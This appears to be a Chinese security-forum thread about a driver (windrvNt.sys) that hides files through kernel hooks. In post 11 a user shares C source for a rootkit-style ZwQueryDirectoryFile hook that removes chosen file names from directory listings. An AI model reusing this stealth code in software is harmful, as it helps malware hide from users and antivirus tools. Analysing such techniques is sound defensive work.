能力值:
( LV12,RANK:370 )
2 楼
windrvNt.sys Hook了那几个函数
上传的附件:
能力值:
( LV2,RANK:10 )
3 楼
[QUOTE=;]...[/QUOTE]
估计采用了rootkit的方法,我也做过一个类似的,在看雪中有下载
能力值:
( LV6,RANK:90 )
4 楼
学习中。。。
能力值:
( LV2,RANK:10 )
5 楼
怎么就成趋势了呢?不时麦咖啡吗?
能力值:
( LV2,RANK:10 )
6 楼
口误口误,是卖咖啡
能力值:
( LV2,RANK:10 )
7 楼
没错就是windrvNT,不过这是newsoftware公司自己专用的程序,其原理不得而知阿。。。
能力值:
( LV2,RANK:10 )
8 楼
rootkit是木马的手法吧,会不会冒犯各大杀毒软件阿。。。
能力值:
( LV9,RANK:330 )
9 楼
弄个双系统或者用winpe启动系统,一切不都看见了么?
能力值:
( LV12,RANK:760 )
10 楼
使用RKU恢复被挂钩的地方立马搞定~
还是太弱了~
能力值:
( LV12,RANK:760 )
11 楼
贴个我的某个玩具的隐藏代码~
#include <ntddk.h>
#include "file.h"
#include "disk.h"
typedef unsigned char BYTE, *PBYTE;
WCHAR *FileToHide[128];
ULONG NbFileToHide=0;
/*
ZwQueryDirectoryFile hook, DKOM type.
*/
ZWQUERYDIRECTORYFILE ZwQueryDirectoryFileAddress = NULL;
NTSTATUS ZwQueryDirectoryFileHook(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG FileInformationLength,
IN FILE_INFORMATION_CLASS FileInformationClass,
IN BOOLEAN ReturnSingleEntry,
IN PUNICODE_STRING FileName OPTIONAL,
IN BOOLEAN RestartScan
)
{
NTSTATUS status;
ULONG NameOffset;
ULONG NameSizeOffset;
WCHAR *FileNamePtr;
PULONG FileNameLength;
PBYTE curr, prev;
PULONG DeltaCurr, DeltaPrev;
UNICODE_STRING UnicodeFilename ;
ULONG i;
status = ((ZWQUERYDIRECTORYFILE)(ZwQueryDirectoryFileAddress)) (
FileHandle,
Event,
ApcRoutine,
ApcContext,
IoStatusBlock,
FileInformation,
FileInformationLength,
FileInformationClass,
ReturnSingleEntry,
FileName,
RestartScan);
if( !NT_SUCCESS(status) )
return status;
curr = FileInformation;
switch( FileInformationClass )
{
/*
we get, for any structure, the offset of the filename and filename size
so we have to write only 1 hook routine :)
*/
case FileDirectoryInformation:
NameOffset = ((ULONG)&(((PFILE_DIRECTORY_INFORMATION)curr)->FileName)) - ((ULONG)curr);
NameSizeOffset = ((ULONG)&(((PFILE_DIRECTORY_INFORMATION)curr)->FileNameLength))
- ((ULONG)curr);
break;
case FileFullDirectoryInformation:
NameOffset = ((ULONG)&(((PFILE_FULL_DIR_INFORMATION)curr)->FileName)) - ((ULONG)curr);
NameSizeOffset = ((ULONG)&(((PFILE_FULL_DIR_INFORMATION)curr)->FileNameLength))
- ((ULONG)curr);
break;
case FileBothDirectoryInformation:
NameOffset = ((ULONG)&(((PFILE_BOTH_DIR_INFORMATION)curr)->FileName)) - ((ULONG)curr);
NameSizeOffset = ((ULONG)&(((PFILE_BOTH_DIR_INFORMATION)curr)->FileNameLength))
- ((ULONG)curr);
break;
case FileNamesInformation:
NameOffset = ((ULONG)&(((PFILE_NAMES_INFORMATION)curr)->FileName)) - ((ULONG)curr);
NameSizeOffset = ((ULONG)&(((PFILE_NAMES_INFORMATION)curr)->FileNameLength))
- ((ULONG)curr);
break;
case FileIdBothDirectoryInformation:
NameOffset = ((ULONG)&(((PFILE_ID_BOTH_DIR_INFORMATION)curr)->FileName)) - ((ULONG)curr);
NameSizeOffset = ((ULONG)&(((PFILE_ID_BOTH_DIR_INFORMATION)curr)->FileNameLength))
- ((ULONG)curr);
break;
case FileIdFullDirectoryInformation:
NameOffset = ((ULONG)&(((PFILE_ID_FULL_DIR_INFORMATION)curr)->FileName)) - ((ULONG)curr);
NameSizeOffset = ((ULONG)&(((PFILE_ID_FULL_DIR_INFORMATION)curr)->FileNameLength))
- ((ULONG)curr);
break;
default:
// this isn't an interesting ZwQueryDirectoryFile call
return status;
}
/*
Now we can apply, as for process, a DKOM hook. For any struct, the first
element is the NextEntryDelta.
we can easily get and modify it :)
*/
for(i=0; i<NbFileToHide; i++) {
curr = FileInformation;
prev = NULL;
while( curr ) {
// we get the NextEntryOffsets
DeltaCurr = (PULONG)curr;
DeltaPrev = (PULONG)prev;
FileNamePtr = (WCHAR*)((PBYTE)curr + NameOffset);
FileNameLength = (PULONG) ((PBYTE)curr + NameSizeOffset);
if( FileNamePtr!=NULL && *FileNameLength == wcslen(FileToHide[i])*2 &&
!memcmp(_wcsupr(FileNamePtr),FileToHide[i],(SIZE_T)*FileNameLength))
{
// file to hide
if( !prev ) {
// we are first of the list
if( *DeltaCurr )
// there's a next entry
(PBYTE)FileInformation += *DeltaCurr;
else
FileInformation = NULL;
}
else {
// there's an entry before
if( *DeltaCurr )
// NextEntryOffset of the previous entry "points" to the next
*DeltaPrev += *DeltaCurr;
else
// we're last file
*DeltaPrev = 0;
}
}
else
// if curr is not to hide, prev becomes curr :)
prev = curr;
if( *DeltaCurr )
curr += *DeltaCurr;
else
curr = NULL;
} // while
} // for
return status;
}
能力值:
( LV2,RANK:10 )
12 楼
支持cvcvxk的代码,不过如果你不是通过修改SSDT,或改写内核函数头,又如何达到hook ZwQueryDirectoryFile呢?如何DKOM?
能力值:
( LV2,RANK:10 )
13 楼
双系统我试了,搞不定它。。。
能力值:
( LV12,RANK:760 )
14 楼
搞不定?是加密部分吧?
双系统,可以看见了,只是还有加密~